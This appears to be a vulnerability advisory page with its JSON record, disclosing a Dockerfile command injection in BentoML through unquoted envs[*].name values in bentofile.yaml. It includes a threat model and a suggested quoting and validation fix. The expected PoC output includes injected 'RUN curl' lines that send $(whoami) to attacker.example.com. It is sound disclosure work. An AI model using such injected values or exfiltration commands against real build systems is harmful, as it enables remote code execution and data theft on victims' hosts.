GHSA-W2PM-X38X-JP44

Vulnerability from github – Published: 2026-05-11 14:27 – Updated: 2026-05-11 14:27
VLAI
Summary
Dockerfile command injection via envs[*].name in bentofile.yaml (sibling fix-bypass of CVE-2026-33744 and CVE-2026-35043)
Details

BentoML envs[*].name Dockerfile command injection — sibling of CVE-2026-33744 / CVE-2026-35043

A malicious bentofile.yaml containing a newline-injected value in envs[*].name produces unquoted RUN directives in the BentoML-generated Dockerfile. When the victim runs bentoml containerize on the imported bento, those RUN directives execute on the host during docker build. Verified end-to-end on bentoml==1.4.38.

Vulnerable code

src/bentoml/_internal/container/frontend/dockerfile/templates/base_v2.j2:71-73:

{% for env in __bento_envs__ %}
{% set stage = env.stage | default("all") -%}
{% if stage != "runtime" -%}
ARG {{ env.name }}{% if env.value %}={{ env.value | bash_quote }}{% endif %}
ENV {{ env.name }}=${{ env.name }}
{% endif -%}
{% endfor %}

env.value is bash-quoted via the bash_quote filter, but env.name is interpolated raw with no escaping or newline filtering. The template is rendered by _bentoml_impl/docker.generate_dockerfile (the v2 SDK Docker generation path used by bentoml containerize for modern services).

Sibling relationship to existing CVEs

The earlier patches addressed the same Dockerfile-command-injection class for a different bentofile field:

  • CVE-2026-33744 / GHSA-jfjg-vc52-wqvf (2026-03-25): added bash_quote to system_packages interpolation in Dockerfile templates and images.py.
  • CVE-2026-35043 / GHSA-fgv4-6jr3-jgfw (2026-04-02): added shlex.quote to system_packages in the cloud deployment path (_internal/cloud/deployment.py:1648).

Both patches limit themselves to system_packages. The envs[*].name field is the same root-cause class (bentofile.yaml value flowing unquoted into a Dockerfile interpretation context) but was never included in the fix scope.

Reproduction

pip install bentoml==1.4.38
python verify_render.py

Expected:

[*] rendered Dockerfile size: 1789 bytes
[*] injected RUN lines: 3
    RUN curl -fsSL http://attacker.example.com/$(whoami)=1
    RUN curl -fsSL http://attacker.example.com/$(whoami)=$FOO
    RUN curl -fsSL http://attacker.example.com/$(whoami)

Each injected RUN line is a Dockerfile command that runs during docker build. With $(whoami) shell-substituted by Docker's RUN executor, the example payload exfiltrates the build host's username.

Threat model

  1. Attacker authors a malicious bento with a crafted bentofile.yaml.
  2. Attacker exports the bento (.bento or .tar.gz) and distributes (S3, HTTP, BentoCloud share, etc.).
  3. Victim imports with bentoml import bento.tar; no validation of envs content.
  4. Victim runs bentoml containerize to build the container image.
  5. BentoML renders the Dockerfile with the attacker's envs values, producing injected RUN lines.
  6. docker build (or BuildKit) executes the injected RUN commands on the build host, achieving RCE in the victim's build environment.

The flow mirrors CVE-2026-33744 exactly, with envs substituted for system_packages.

Suggested fix

In base_v2.j2 lines 71-73, apply the bash_quote filter to env.name (and to the =$VAR reference in the ENV line, since the variable name itself is reused there):

ARG {{ env.name | bash_quote }}{% if env.value %}={{ env.value | bash_quote }}{% endif %}
ENV {{ env.name | bash_quote }}=${{ env.name | bash_quote }}

Better, since env.name is semantically a Dockerfile identifier, validate at the schema level: in bentoml/_internal/bento/build_config.py:BentoEnvSchema, add an attr.validators.matches_re(r"^[A-Za-z_][A-Za-z0-9_]*$") to the name field so newline / shell-metacharacter values are rejected at config load.

Affected versions

  • bentoml 1.4.38 (verified end-to-end)
  • Likely all 1.x versions where _bentoml_impl/docker.py exists; the v2 SDK code path was added before the CVE-2026-33744 / CVE-2026-35043 patches and was not retroactively swept for siblings.

Disclosure

Requesting CVE assignment and GHSA publication. Available for additional repro under different distros / frontends, or for a PR with the suggested fix, on request.

PoC artifacts

Gated HF repo (request access): https://huggingface.co/mrw0r57/bentoml-envs-cmdinjection-poc

Severity
8.8 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.4.38"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "bentoml"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.4.39"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44346"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-11T14:27:37Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "# BentoML `envs[*].name` Dockerfile command injection \u2014 sibling of CVE-2026-33744 / CVE-2026-35043\n\nA malicious `bentofile.yaml` containing a newline-injected value in `envs[*].name` produces unquoted `RUN` directives in the BentoML-generated Dockerfile. When the victim runs `bentoml containerize` on the imported bento, those `RUN` directives execute on the host during `docker build`. Verified end-to-end on `bentoml==1.4.38`.\n\n## Vulnerable code\n\n`src/bentoml/_internal/container/frontend/dockerfile/templates/base_v2.j2:71-73`:\n\n```jinja\n{% for env in __bento_envs__ %}\n{% set stage = env.stage | default(\"all\") -%}\n{% if stage != \"runtime\" -%}\nARG {{ env.name }}{% if env.value %}={{ env.value | bash_quote }}{% endif %}\nENV {{ env.name }}=${{ env.name }}\n{% endif -%}\n{% endfor %}\n```\n\n`env.value` is bash-quoted via the `bash_quote` filter, but **`env.name` is interpolated raw** with no escaping or newline filtering. The template is rendered by `_bentoml_impl/docker.generate_dockerfile` (the v2 SDK Docker generation path used by `bentoml containerize` for modern services).\n\n## Sibling relationship to existing CVEs\n\nThe earlier patches addressed the same Dockerfile-command-injection class for a different bentofile field:\n\n- **CVE-2026-33744 / GHSA-jfjg-vc52-wqvf** (2026-03-25): added `bash_quote` to `system_packages` interpolation in Dockerfile templates and `images.py`.\n- **CVE-2026-35043 / GHSA-fgv4-6jr3-jgfw** (2026-04-02): added `shlex.quote` to `system_packages` in the cloud deployment path (`_internal/cloud/deployment.py:1648`).\n\nBoth patches limit themselves to `system_packages`. The `envs[*].name` field is the same root-cause class (`bentofile.yaml` value flowing unquoted into a Dockerfile interpretation context) but was never included in the fix scope.\n\n## Reproduction\n\n```bash\npip install bentoml==1.4.38\npython verify_render.py\n```\n\nExpected:\n\n```\n[*] rendered Dockerfile size: 1789 bytes\n[*] injected RUN lines: 3\n    RUN curl -fsSL http://attacker.example.com/$(whoami)=1\n    RUN curl -fsSL http://attacker.example.com/$(whoami)=$FOO\n    RUN curl -fsSL http://attacker.example.com/$(whoami)\n```\n\nEach injected `RUN` line is a Dockerfile command that runs during `docker build`. With `$(whoami)` shell-substituted by Docker\u0027s RUN executor, the example payload exfiltrates the build host\u0027s username.\n\n## Threat model\n\n1. Attacker authors a malicious bento with a crafted `bentofile.yaml`.\n2. Attacker exports the bento (`.bento` or `.tar.gz`) and distributes (S3, HTTP, BentoCloud share, etc.).\n3. Victim imports with `bentoml import bento.tar`; no validation of `envs` content.\n4. Victim runs `bentoml containerize` to build the container image.\n5. BentoML renders the Dockerfile with the attacker\u0027s `envs` values, producing injected `RUN` lines.\n6. `docker build` (or BuildKit) executes the injected `RUN` commands on the build host, achieving RCE in the victim\u0027s build environment.\n\nThe flow mirrors CVE-2026-33744 exactly, with `envs` substituted for `system_packages`.\n\n## Suggested fix\n\nIn `base_v2.j2` lines 71-73, apply the `bash_quote` filter to `env.name` (and to the `=$VAR` reference in the `ENV` line, since the variable name itself is reused there):\n\n```jinja\nARG {{ env.name | bash_quote }}{% if env.value %}={{ env.value | bash_quote }}{% endif %}\nENV {{ env.name | bash_quote }}=${{ env.name | bash_quote }}\n```\n\nBetter, since `env.name` is semantically a Dockerfile identifier, validate at the schema level: in `bentoml/_internal/bento/build_config.py:BentoEnvSchema`, add an `attr.validators.matches_re(r\"^[A-Za-z_][A-Za-z0-9_]*$\")` to the `name` field so newline / shell-metacharacter values are rejected at config load.\n\n## Affected versions\n\n- bentoml 1.4.38 (verified end-to-end)\n- Likely all 1.x versions where `_bentoml_impl/docker.py` exists; the v2 SDK code path was added before the CVE-2026-33744 / CVE-2026-35043 patches and was not retroactively swept for siblings.\n\n## Disclosure\n\nRequesting CVE assignment and GHSA publication. Available for additional repro under different distros / frontends, or for a PR with the suggested fix, on request.\n\n\n## PoC artifacts\n\nGated HF repo (request access): https://huggingface.co/mrw0r57/bentoml-envs-cmdinjection-poc",
  "id": "GHSA-w2pm-x38x-jp44",
  "modified": "2026-05-11T14:27:37Z",
  "published": "2026-05-11T14:27:37Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/bentoml/BentoML/security/advisories/GHSA-78f9-r8mh-4xm2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/bentoml/BentoML/security/advisories/GHSA-w2pm-x38x-jp44"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/bentoml/BentoML"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Dockerfile command injection via envs[*].name in bentofile.yaml (sibling fix-bypass of CVE-2026-33744 and CVE-2026-35043)"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.